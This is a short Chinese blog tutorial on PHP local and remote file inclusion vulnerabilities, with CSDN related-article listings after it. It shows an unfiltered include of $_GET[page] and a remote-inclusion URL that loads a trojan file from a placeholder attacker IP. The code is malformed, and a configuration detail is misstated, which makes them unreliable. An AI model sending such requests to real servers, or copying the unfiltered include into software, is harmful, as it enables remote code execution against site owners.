文件包含漏洞之——概述及分类演示

最新推荐文章于 2024-09-11 18:11:29 发布
最新推荐文章于 2024-09-11 18:11:29 发布
阅读量684 收藏 1
点赞数
分类专栏: web渗透测试与代码审计 #+ 文件包含漏洞 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43079958/article/details/105398446
版权

文件包含漏洞概述及分类演示

包含漏洞简介

目录

包含操作,在大多数Web语言中都会提供的功能,但PHP对于包含文件所提供的功能太强大,太灵活,所以包含漏洞经常出现在PHP语言中,这也就导致了出现了一个错误现状,很多初学者认为包含漏洞只出现PHP语言之中,殊不知在其他语言中可能出现包含漏洞。这也应了一句老话:功能越强大,漏洞就越多。

漏洞原因

	包含漏洞不是语言的问题,而是人的思维问题

PHP中的四个包含文件函数

			include()
			include_once()
			require()
			require_once()

			做代码审计,应该着重找这几个函数
				原因就是这几个函数的参数值都会当做php文件解析

PHP包含漏洞分类

本地包含 LIF

		即把函数后的参数修改成为服务器本地的文件
			例如

	main.php
		<?p
		include''$_GET[page]'';>

				1.html

页面1

此时输入http://192.168.1.55:8080/include/main.php?page=1.html
就可以直接执行1.html了
注意配置文件php.ini需要allow_url_include=on 并且 magic_quotes_gpc=off

远程包含

即把函数后的参数修改成为攻击者指定的web站点目录下的文件,都不一定是攻击者自身站点,任何站点都可以
直接输入http://192.168.1.55:8080/include/main.php?page=攻击者IP/include/muma.jpg

温柔小薛
关注
专栏目录
eyoucms V1.0.4 后台任意文件读取漏洞1
08-03
在eyoucms V1.0.4版本中,发现了一个严重的安全问题——后台任意文件读取漏洞。该漏洞位于后台高级选项的“模板管理”页面。攻击者可以通过该漏洞读取服务器上的任意文件,从而获取敏感信息或进一步执行其他恶意操作...
Web漏洞-文件包含漏洞超详细全解(附实例)
ran的博客
04-05 6587
",因为在进行文件包含的时候,回根据网站的脚本类型来执行文件内的内容,而这里网站的脚本类型本身就是php,所以不加"
【网络安全 --- 文件包含漏洞文件包含漏洞详解
m0_67844671的博客
11-27 1万+
【网络安全 --- 文件包含漏洞文件包含漏洞详解
【网络安全】-文件包含漏洞-pikachu
最新发布
weixin_65311462的博客
09-11 1742
文件包含漏洞是指程序在执行过程中,将外部文件的内容作为程序代码或数据的一部分来执行使用,从而导致hacker可以利用这个漏洞包含恶意文件,执行任意代码进而访问敏感信息。1.本地文件包含漏洞与远程文件包含漏洞在防范措施上,两者都需要对用户输入进行严格的验证和过滤,但远程文件包含漏洞还需要特别注意禁用相关配置选项和限制外部资源的访问权限。
文件包含漏洞全面详解
热门推荐
m0_46467017的博客
08-17 7万+
1.文件包含漏洞概述和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。...
文件包含漏洞(原理及介绍)
未来社会二十年发展的核心技术趋势由ABCD四个字母组成,分别是AI(人工智能)、BlockChain(区块链)、Cloud(云)、和Data(大数据)每一次进步都有新的认知和感触
12-08 6212
File inclusion,文件包含漏洞)。程序开发人员通常出于灵活性的考虑,会将被包含的文件设置成变量,然后动态调用这些文件。但正是因为调用的灵活性导致用户可能调用一些恶意文件,造成文件包含漏洞文件包含漏洞分为本地文件包含漏洞和远程文件包含漏洞.
文件包含漏洞
nobugnomoney的博客
03-23 5066
一、文件包含漏洞原理 PHP语言提供的文件包含功能太强大,太灵活,所以包含漏洞常常出现在PHP中,但不只是PHP中有包含漏洞,其他语言也有包含漏洞,如java等,本篇主要以PHP为例讲解原理及其利用技巧: PHP提供4个文件包含的函数 1、include():找不到文件时继续执行,只会警告 2、include_once():与include()类似,只是如果文件中的代码已被包含,则不会再次包含 3、require():找不到文件时会爆出致命的错误; 4、require_once():与上述的类似; 1、本地
漏洞挖掘的“奇招” 安全检测中的特殊案例分析与总结-漏洞银行大咖面对面40-王骕
01-25
- **社区云下的任意文件下载漏洞利用**:随着云计算的发展,新的安全挑战也随之出现。 - **企业向云迁移造成的信息集中安全隐患**:企业在向云端迁移的过程中,可能会因为信息过于集中而带来新的风险。 6. **真的...
全力护卫中国工业网络安全——义不容辞.pdf
09-20
这是基于工业控制系统攻防演示仿真环境进行的,目的在于分析控制设备、网络、协议、系统、应用、软件及流程等方面可能存在的漏洞和风险。通过这种方式,可以开展合规性检查,并使用演示环境评估安全方案的可行性与...
深入编程内幕---Visual C++.pdf
11-03
在VC++中,项目是以 *Project* 的形式组织起来的,每个项目对应一个 `.dsp` 文件,该文件包含了项目的所有相关信息。 - **文件类型**: - **`.dsw` 文件**:最高级别的文件类型,称为 *Workspace* 文件。一个 *...
sketch_jan07a_Sketch!_badusb_
10-03
【描述】提到这是"恶搞文件",这可能意味着该文件是为了模拟或演示BadUSB攻击,而不是实际的恶意程序。"只是一个小小文件"表明它可能体积不大,但依然能够传达BadUSB攻击的基本原理或概念。 【标签】"Sketch! bad...
文件包含漏洞-日志注入
superman66697的博客
08-16 1516
文件包含漏洞是 Web 应用程序中的一种常见漏洞。当应用程序允许用户控制包含在页面上的文件时,攻击者就可以利用这一点来包含恶意文件。这种恶意文件可能包含执行恶意代码,导致各种攻击,如代码执行、数据泄露或其他未授权的行为。日志注入是通过插入恶意数据到应用程序的日志文件来实施的攻击。当这些日志被其他系统或应用程序读取和解析时,攻击者的恶意数据可能会被执行。这通常利用了不安全的日志处理机制和文件包含漏洞的组合。
什么是文件包含漏洞
m0_74013288的博客
11-05 323
文件包含漏洞(File Inclusion Vulnerability)是一种web应用程序中常见的安全漏洞,它允许攻击者在应用程序中任意包含本地或远程文件。通过利用这个漏洞,攻击者可以访问并执行未授权的文件,可能导致敏感信息泄露、远程命令执行、甚至完全控制目标系统。文件包含漏洞通常存在于web应用程序中,特别是在未正确输入验证和过滤的用户提供的输入的情况下。攻击者可以通过操纵请求参数、URL路径或Cookie等输入方式来改变应用程序解析和包含文件的逻辑。
文件包含漏洞详解
Ays.Ie的博客
10-31 4672
本篇文章主要讲解文件包含漏洞,内容包括文件包含漏洞的原理,验证,以及修复的策略
一文详解文件包含漏洞
MachineGunJoe666
06-10 2216
file:// #访问本地文件系统http:// #访问HTTPs网址ftp:// #访问ftp URLphp:// #访问输入输出流zlib:// #压缩流data:// #数据expect:// #处理交互式的流glob:// #查找匹配的文件路径。
网络安全文件包含漏洞总结
kali_Ma的博客
03-10 2360
介绍 文件包含漏洞属于代码注入漏洞,为了减少重复代码的编写,引入了文件包含函数,通过文件包含函数将文件包含进来,直接使用包含文件的代码;简单来说就是一个文件里面包含另外一个或多个文件。 但我们除了包含常规的代码文件外,包含的任意后缀文件都会被当作代码执行,因此,如果有允许用户控制包含文件路径的点,那么则很有可能包含非预期文件,从而执行非预期的代码导致getshell。 几乎所有的脚本语言中都会提供文件包含的功能,但文件包含漏洞在PHP Web Application中居多,在JSP、ASP中十分少甚至没有,
WEB漏洞:文件操作漏洞解析——下载、读取与防护
1. 文件包含漏洞(File Inclusion Vulnerability): 当Web服务器错误地解析某些文件(如PHP的`include`, `require`, 或者HTML中的`<iframe>`标签),允许用户指定动态加载外部文件时,就存在文件包含漏洞。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值